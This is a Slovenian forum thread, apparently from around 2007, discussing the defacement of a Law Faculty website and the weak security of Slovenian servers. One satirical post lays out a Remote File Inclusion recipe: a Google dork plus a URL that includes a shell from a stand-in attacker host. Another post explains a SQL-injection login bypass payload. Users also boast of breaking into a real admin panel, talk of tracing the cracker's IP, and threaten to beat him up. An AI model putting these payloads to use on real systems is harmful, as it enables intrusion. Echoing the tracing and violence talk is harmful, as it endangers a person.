Novice » Varnost » Razobličenje spletne strani Pravne fakultete
MrStein ::
Pyr0Beast:
Meni ne. FF 2.0.0.1 na w2k
a še komu zapre ff na linku od Urc-a?
Meni ne. FF 2.0.0.1 na w2k
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!
iggy ::
Za foro sem si dodal tega x-turka na msn, da vidim kakšen tipo je to. Človek je takoj vedel da sem iz slovenije in da imamo v naši državici zelo slabo varnost kar se tiče informaciske tehnologije. Dal mi je tudi neke linke do ene strani ker ima človek napisanih n-tutorialov glede varnosti.
Hey, you're fat!
denial ::
Pa ga prosim vprašaj, če lahko argumentira, da imamo v .SI "zelo slabo varnost kar se tiče informacijske tehnologije". Najbrž ne sklepa zgolj iz tega, ker je 0wnal par univerzitetnih serverjev?
PS: Ali lahko vidimo te njegove tutoriale?
PS: Ali lahko vidimo te njegove tutoriale?
SELECT finger FROM hand WHERE id=3;
Zgodovina sprememb…
- spremenil: denial ()
Looooooka ::
ja itak da mamo v sloveniji za en drek varnost.
te streznike postavlajo smrkavci,ki "obvladajo" linux.ce pogledas OS vecine hekanih strani je na vecini gor linux.
Problem je pa ta da tko veselo instalirajo neki s cdja zalaufajo apache in to je to.Ce pa ze kj vec nardijo pa pol pozabjo patchat pa redno upgrejdat zadeve in gre vse v tri krasne po par tednih.
takim adminom bi blo velik bols na windows 2000 al pa 2003 pa naj autoupdate vklopjo.
za lenuhe pa pretenderje pac ni administracija.me tud zanima kok jih je dejansko poslal mail da so zvedl kje je bil problem =)
hm manjsi popravek.sm glih opazu da sm post tko napisu da zgleda k da je windows 2000 trdnjava....
povedat sm hotu da majo taki lenuhi vecjo moznost da jih ne bojo ownal na winsih z autoupdate...ker na prejsnem OS-ju itak nc niso delal =)
te streznike postavlajo smrkavci,ki "obvladajo" linux.ce pogledas OS vecine hekanih strani je na vecini gor linux.
Problem je pa ta da tko veselo instalirajo neki s cdja zalaufajo apache in to je to.Ce pa ze kj vec nardijo pa pol pozabjo patchat pa redno upgrejdat zadeve in gre vse v tri krasne po par tednih.
takim adminom bi blo velik bols na windows 2000 al pa 2003 pa naj autoupdate vklopjo.
za lenuhe pa pretenderje pac ni administracija.me tud zanima kok jih je dejansko poslal mail da so zvedl kje je bil problem =)
hm manjsi popravek.sm glih opazu da sm post tko napisu da zgleda k da je windows 2000 trdnjava....
povedat sm hotu da majo taki lenuhi vecjo moznost da jih ne bojo ownal na winsih z autoupdate...ker na prejsnem OS-ju itak nc niso delal =)
Zgodovina sprememb…
- spremenilo: Looooooka ()
zerox ::
http://www.zone-h.org/component/option,...
Resolved [ orodje.info ] to 195.246.8.55
Resolved [ pora-gr.si ] to 195.246.8.55
Resolved [ podsvojostreho.net ] to 195.246.8.55
Resolved [ prometnovarnostnicenter.si ] to 195.246.8.55
Resolved [ pgp-nepremicnine.com ] to 195.246.8.55
Resolved [ plavalniklub-ilirija.si ] to 195.246.8.55
Resolved [ raduha.com ] to 195.246.8.55
Resolved [ mreze-frlic.si ] to 195.246.8.55
Resolved [ lavie.si ] to 195.246.8.55
itd...
a nam to kaj pove ?
Resolved [ orodje.info ] to 195.246.8.55
Resolved [ pora-gr.si ] to 195.246.8.55
Resolved [ podsvojostreho.net ] to 195.246.8.55
Resolved [ prometnovarnostnicenter.si ] to 195.246.8.55
Resolved [ pgp-nepremicnine.com ] to 195.246.8.55
Resolved [ plavalniklub-ilirija.si ] to 195.246.8.55
Resolved [ raduha.com ] to 195.246.8.55
Resolved [ mreze-frlic.si ] to 195.246.8.55
Resolved [ lavie.si ] to 195.246.8.55
itd...
a nam to kaj pove ?
Looooooka ::
http://195.246.8.55
pove ja...da si je nekdo vzel FUL cajta da je zrihtu zadevo predn jo je zacel nucat za hostanje.
lazy bastard
pove ja...da si je nekdo vzel FUL cajta da je zrihtu zadevo predn jo je zacel nucat za hostanje.
lazy bastard
Daedalus ::
te streznike postavlajo smrkavci,ki "obvladajo" linux.ce pogledas OS vecine hekanih strani je na vecini gor linux.
Problem je pa ta da tko veselo instalirajo neki s cdja zalaufajo apache in to je to.Ce pa ze kj vec nardijo pa pol pozabjo patchat pa redno upgrejdat zadeve in gre vse v tri krasne po par tednih.
takim adminom bi blo velik bols na windows 2000 al pa 2003 pa naj autoupdate vklopjo.
Ja, to bi rešlo problem nesposobnih adminov. Autoupdate, namreč Če folk nima pojma, nima pojma. Če nimaš pojma, ti tud windowz point'n'click čisto nič ne pomeni. Ker pač nimaš pojma in ne boš znal stvari postavit tako, da bi ble vsaj približno varne. Jaki vam argumenti, ni kaj.
Man is condemned to be free; because once thrown into the world,
he is responsible for everything he does.
[J.P.Sartre]
he is responsible for everything he does.
[J.P.Sartre]
iggy ::
Btw ni mi jasno kako so sploh našli naše strani saj teji "crackerji" komaj da znajo govoriti angleško. Se pogovarjam z njim na msnju komaj da ga razumem.
Hey, you're fat!
Celeborn ::
iggy: a lahko prilimaš link do te strani s tutoriali o varnosti?
If air travel is so safe, why do they call it a "terminal"?
denial ::
m4d h4X0r sk1llz:
1.) greš na milw0rm in filtriraš vse Remote File Inclusion exploite
2.) greš na Google in vneseš "inurl: ranljiva_skripta.php"
3.) kilkneš na prvi link, dodaš:
url/ranljiva_skripta.php?include_path="http://m4d_hax0r.com/ shell.php"
4.) 0wn3d!
5.) greš na MSN/IRC/zone-h ter obelodaniš podvig (ne pozabiš omeniti, da security suxxx)
Vsakršna pod(r)obnost je zgolj naključna...
1.) greš na milw0rm in filtriraš vse Remote File Inclusion exploite
2.) greš na Google in vneseš "inurl: ranljiva_skripta.php"
3.) kilkneš na prvi link, dodaš:
url/ranljiva_skripta.php?include_path="http://m4d_hax0r.com/ shell.php"
4.) 0wn3d!
5.) greš na MSN/IRC/zone-h ter obelodaniš podvig (ne pozabiš omeniti, da security suxxx)
Vsakršna pod(r)obnost je zgolj naključna...
SELECT finger FROM hand WHERE id=3;
Zgodovina sprememb…
- spremenil: denial ()
Pyr0Beast ::
Ujej. .. auto-add ma. Makes you think
Script kiddzor. Kaj si želim, da bi se mu neki slabga zgodilo.
Script kiddzor. Kaj si želim, da bi se mu neki slabga zgodilo.
Some nanoparticles are more equal than others
Good work: Any notion of sanity and critical thought is off-topic in this place
Good work: Any notion of sanity and critical thought is off-topic in this place
joker16_7 ::
Ja, če je na msnju mu resolvaš IP. Pol pa itak ni problem resolvat še njegovo trenutno lokacijo. Pa sam škife še pošleš nekam v Turčijo pa zagrabjo smrkavca.
P.S. Razen če ni povezan prek kerega shekanega serverja. Pol se zadeva zaplete
P.S. Razen če ni povezan prek kerega shekanega serverja. Pol se zadeva zaplete
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
Pyr0Beast ::
Bomo mal pogledal za njegovim ip-jem
Mulc je baje gor
Mulc je baje gor
Some nanoparticles are more equal than others
Good work: Any notion of sanity and critical thought is off-topic in this place
Good work: Any notion of sanity and critical thought is off-topic in this place
joker16_7 ::
Eh, kr osebno ko grem poleti v Turčijo ga grem nabit. Sam lokacijo povejte.....
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
iMark ::
Ja in kej je težko dobit njegov IP?
Če že drugače ne pa tko da se mu da link od kšne strani (foruma), on gre gor, pa je
Če že drugače ne pa tko da se mu da link od kšne strani (foruma), on gre gor, pa je
Zgodovina sprememb…
- spremenil: iMark ()
W3by ::
Zanima me zakaj mulca ne morjo dobit? Očitno se zna usej dobro prikrit.
Glede security na slovenskih straneh pa sploh no comment. Zadnič sem tko u easy mal gledal eno stran, za foro napišem admin/ se odpre login, dam not SQL injection in lejga že sm not. Simpl k pasulj. Tale očitno cila na include fajlov...
Glede security na slovenskih straneh pa sploh no comment. Zadnič sem tko u easy mal gledal eno stran, za foro napišem admin/ se odpre login, dam not SQL injection in lejga že sm not. Simpl k pasulj. Tale očitno cila na include fajlov...
joker16_7 ::
In ka je to SQL injection?
P.S. Al si dobesedno to napiso?
P.S. Al si dobesedno to napiso?
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
Zgodovina sprememb…
- spremenilo: joker16_7 ()
W3by ::
Pac na eni strani, ki zares obstaja No sej ne recem - je ze starejsa pa to pa tud admini so zabiti, vendar bi useen lahko poskrbel za varnost. Naslova pa useen nebi dajal na ogled
Celeborn ::
Pa ste prepričani da se da preko MSN-ja izvedet IP? A ne gre vsa komunikacija preko Microsoftovega strežnika?
If air travel is so safe, why do they call it a "terminal"?
iggy ::
Dalo se je izvedeti pri starejših verzijah. Zdaj se da izvedeti samo če pošlješ file in tako izveš IP
Hey, you're fat!
TylerDurden ::
V bistvu sem avtor strani PF jaz, žal so me pred 2 leti odstavili s projekta zaradi novega kadra, ki ne ve kaj je PHP niti MySQL, še manj pa kaj je strežnik .
Ob vdoru je klonil security hosterjev kelt.si in ne stran, če smo že ravno pri tem.
Žalostno je, da so rabili več kot 24 ur, da so zbrisali tisti index.html.
Ob vdoru je klonil security hosterjev kelt.si in ne stran, če smo že ravno pri tem.
Žalostno je, da so rabili več kot 24 ur, da so zbrisali tisti index.html.
Let\'s make some soap ...
orbiter ::
Strani hekajo zgolgočaseni kreteni, ki imajo v življenju le dvoje - računalnik ter gnile možgane.
Pyr0Beast ::
Pa niti ne. samo malenkost morale in družbe jim primanjkuje. dejansko lahko tega človeka psihično čisto do dna potlačiš s parimi besedami :P
Some nanoparticles are more equal than others
Good work: Any notion of sanity and critical thought is off-topic in this place
Good work: Any notion of sanity and critical thought is off-topic in this place
joker16_7 ::
A lahk please en bolj po slovensko in na izi način pove ka je to SQL, ker nimam blage veze ka to pomen pa sem vse prebral na wikipediji...please...
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
Kenpachi ::
SQL @ Wikipedia
Citat: "SQL ali strukturirani povpraševalni jezik za delo s podatkovnimi bazami (angl. Structured Query Language) je povpraševalni jezik, ki je namenjen delu s podatkovnimi zbirkami, s programskimi stavki, ki posnemajo ukaze v naravnem jeziku."
Bolj na izi ne bi moglo it.
Citat: "SQL ali strukturirani povpraševalni jezik za delo s podatkovnimi bazami (angl. Structured Query Language) je povpraševalni jezik, ki je namenjen delu s podatkovnimi zbirkami, s programskimi stavki, ki posnemajo ukaze v naravnem jeziku."
Bolj na izi ne bi moglo it.
Zaraki Kenpachi.
joker16_7 ::
No, zdaj kapiram. In kaj to koristi pri vpisovanju pod admina, kot je nekdo nekaj sporočil nazaj omenil....
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
Roadkill ::
SQL injection v grobem pomeni, da lahko izkoristiš slabo spisano kodo, da namesto, da bi v polje password vpisal dejansko geslo, vpišeš SQL stavek, ki je vedno resničen.
Torej za uporabniško ime napišeš "Administrator" za geslo pa napišeš nekaj v stilu "lala' or 1 = 1;"
To pomeni, da zaradi slabo napisanega SQL stavka lahko user v vnosnem polju sam nadaljuje SQL stavek, kjer je zelo enostavno doseči, da bo ta stavek vedno resničen (1=1 je vedno res).
Tale primer je nepopoln in trivialen, ampak mislim, da vsaj na daleč povzame bistvo.
Torej za uporabniško ime napišeš "Administrator" za geslo pa napišeš nekaj v stilu "lala' or 1 = 1;"
To pomeni, da zaradi slabo napisanega SQL stavka lahko user v vnosnem polju sam nadaljuje SQL stavek, kjer je zelo enostavno doseči, da bo ta stavek vedno resničen (1=1 je vedno res).
Tale primer je nepopoln in trivialen, ampak mislim, da vsaj na daleč povzame bistvo.
Ü
Karlos ::
Če slika pove več kot 1000 besed potem video pove več kot 10^6 besed...
Evo link iz angleške wikipedije SQL injection na delu
Evo link iz angleške wikipedije SQL injection na delu
Sai Baba: "Dam vam to, kar hočete, da boste hoteli to, kar vam želim dati."
Person ::
Hm, a pa to vedno dela, da se lahko prijaviš v sistem, če si pač vnostni form shraniš na disk?
Pač jaz sem si form od naše fakultete shranil na disk, pa se hotel s svojim geslom prijaviti v sitem (pač da ne bi vedno rabil gesla vpisovati, ker pač si firefox v tem primeru gesla ne zna zapomnit).
No, pa ni šlo ... uspelo mi je edino, da so me začasno blokirali
Pač jaz sem si form od naše fakultete shranil na disk, pa se hotel s svojim geslom prijaviti v sitem (pač da ne bi vedno rabil gesla vpisovati, ker pač si firefox v tem primeru gesla ne zna zapomnit).
No, pa ni šlo ... uspelo mi je edino, da so me začasno blokirali
Let's make something useful!
overlord_tm ::
Mogoče čekirajo refferal (s katere strani si prišel). V tem primeru pa pomaga javascript injection =)
joker16_7 ::
Roadkiller zelo lepo si napisal, tnx. Se pravi napišeš v mesto za password lol 1=1 in je to to.
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
bremzzi ::
ne, pa najprej se nauči malo recimo mysqla in phpja, da ti bo sploh jasno kaj se dogaja pri celi stvari
overlord_tm ::
joker ... približno tako ja ... samo kot so ti že svetoval. Če te zanima se nauči PHP/MySql ali kako podobno kombinacijo, ki za bazo uporabla MySql. Ker če pač ne delaš s temi orodji, je tak javascript injection ubistvu nemogoče razložit. Vsaj na podlagi ene 10 sošolcev, ko rabiš na neki "hackerski" strani za končanje misije uporabo MySql injectiona in noben ni dojel zakaj se gre. Na koncu pač skopirajo tisto kar jim poveš in so happy.
joker16_7 ::
Sam res. A ve kdo za kak vodič oz. knjigco o tem kar koli že omenjaš overlord_tm? Oz. čemu sploh nuca če veš ta jezik na pamet oz. se spoznaš na delo z njim? A to kej koristi pri izdelavi spletne strani?
P.S. Saj vem da se neumno sliši, ampak proso bi mal potrpežljivsoti, ker sem ko ka že na tem področju še ful boli ....sj vem da ste.....
P.S. Saj vem da se neumno sliši, ampak proso bi mal potrpežljivsoti, ker sem ko ka že na tem področju še ful boli ....sj vem da ste.....
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
sidd ::
joker16_7: ti svetujem, da si dobiš kak pdf, al pa v knjižnico, pa najprej sam malo prebereš ;) Ker ko skapiraš po lastni logiki, si nekaj naredil. Če te pač samo informativno zanima stavek dva, pa ti naj kr nekdo razlaga če mu je
no idea for signature
signed
I
signed
I
joker16_7 ::
Nene, sj glih to rabm. Pdf priročnik ali kar koli podobnega. Knjiga mi glih ni najbolj po srcu. Če mate kak link bi proso.....
"Ambition is the path to success. Persistence is the vehicle you arrive in."
Bill Bradley
Bill Bradley
bremzzi ::
Napiši v google php mysql tutorial pa se začni učit programiranja.
Ko ti bo enkrat programska logika postala jasna (pogojnimi stavki ipd.) ti bo tudi popolnoma jasno kaj je tale SQL injection in kako deluje.
Ko ti bo enkrat programska logika postala jasna (pogojnimi stavki ipd.) ti bo tudi popolnoma jasno kaj je tale SQL injection in kako deluje.
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | [PF] Programi za izpopolnjevanjeOddelek: Šola | 1750 (1448) | Raptor F16 |
» | Razobličenje spletne strani Pravne fakultete (strani: 1 2 3 )Oddelek: Novice / Varnost | 17401 (12389) | gzibret |
» | Hekerji so poskušali sabotirati svetovni spletOddelek: Loža | 1653 (1187) | sidd |
» | Domače branje: "Bogataj, Maja (ur.). 2003. Internet in pravo. Ljubljana: Pravna fakulOddelek: Novice / Domače branje | 4111 (3596) | poweroff |